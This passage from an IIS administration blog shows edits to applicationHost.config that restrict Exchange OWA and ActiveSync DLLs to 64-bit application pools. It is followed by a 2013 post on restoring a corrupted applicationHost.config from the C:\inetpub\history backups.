      <add name=”PasswordExpiryModule” image=”C:\Windows\system32\RpcProxy\RpcProxy.dll” />to the following
      <add name=”PasswordExpiryModule” image=”C:\Windows\system32\RpcProxy\RpcProxy.dll”
      preCondition=”bitness64″ />
  3. If Outlook Web Access is installed on the server, perform the following additional steps.Note that the “path” part of the entries will depend on your local installation and you should not change it. Not all of these entries are present in every installation. You can ignore any entries that are not present.In the file %windir%\system32\inetsrv\config\applicationhost.config:
    •  change the line
      <filter name=”Exchange OWA Cookie Authentication ISAPI Filter”
      path=”C:\Exchange\ClientAccess\owa\auth\owaauth.dll” enabled=”true”  />to the following
      <filter name=”Exchange OWA Cookie Authentication ISAPI Filter”
      path=”C:\Exchange\ClientAccess\owa\auth\owaauth.dll” enabled=”true” preCondition=”bitness64″ />
    • change the line
      <filter name=”Exchange ActiveSync ISAPI Filter”
      path=”C:\Exchange\ClientAccess\sync\bin\AirFilter.dll” enabled=”true”   />to the following
      <filter name=”Exchange ActiveSync ISAPI Filter”
      path=”C:\Exchange\ClientAccess\sync\bin\AirFilter.dll” enabled=”true”
      preCondition=”bitness64″ />
    • change the line
      <add name=”exppw”
      image=”C:\Program Files\Microsoft\Exchange Server\ClientAccess\Owa\auth\exppw.dll”  />to the following
      <add name=”exppw”
      image=”C:\Program Files\Microsoft\Exchange Server\ClientAccess\Owa\auth\exppw.dll”
      preCondition=”bitness64″ />
    • change the line
      <add name=”kerbauth”
      image=”C:\Program Files\Microsoft\Exchange Server\V14\Bin\kerbauth.dll”  />to the following
      <add name=”kerbauth”
      image=”C:\Program Files\Microsoft\Exchange Server\V14\Bin\kerbauth.dll”
      preCondition=”bitness64″ />
    • change the line
      <add name=”exppw” />to the following
      <add name=”exppw” preCondition=”bitness64″ />
  4. If you do not want to require HTTPS (SSL), you may need to use IIS manager to disable this requirement for specific virtual websites or directories.

You may need to recycle application pools and/or restart IIS in order to apply these changes.

The attribute  preCondition=”bitness64″ avoid to load these dlls on 32 bit websites

 

26 novembre 2013
di max
0 commenti

Fixing Corrupted applicationHost.config file in IIS 7 and IIS 7.5

1.00 avg. rating (53% score) - 1 vote

Recently one of my clients applicationHost.config files became corrupted, it might my fault because I was editing that file with notepad, and something went wrong.

Anyways IIS7 was erroring out with the error below when I tried to access the websites and application pools. So all websites and web applications were unavailable.

The Windows Process Activation Service encountered an error trying to read configuration data from file ‘\\?\C:\Windows\system32\inetsrv\config\applicationHost.config’, line number ’1′. The error message is: ‘Configuration file is not well-formed XML’

The applicationHost.config is situated on C:\Windows\system32\inetsrv\config\applicationHost.config

To access the history of the applicationHost.config file.

1. Browse to C:\inetpub\history directory
2. Inside this directory you will find a list of folders with the history of all the applicationHost.config file.
3. Pick a applicationHost.config file that you know is not corrupted. I usually pick one a few hours back to be safe.
4. Copy the applicationHost.config file and paste it into the C:\Windows\system32\inetsrv\config directory, replacing the corrupted file.
5. Now attempt to access IIS7 again. This time IIS7 should open, and you should be able to access all your sites and web apps.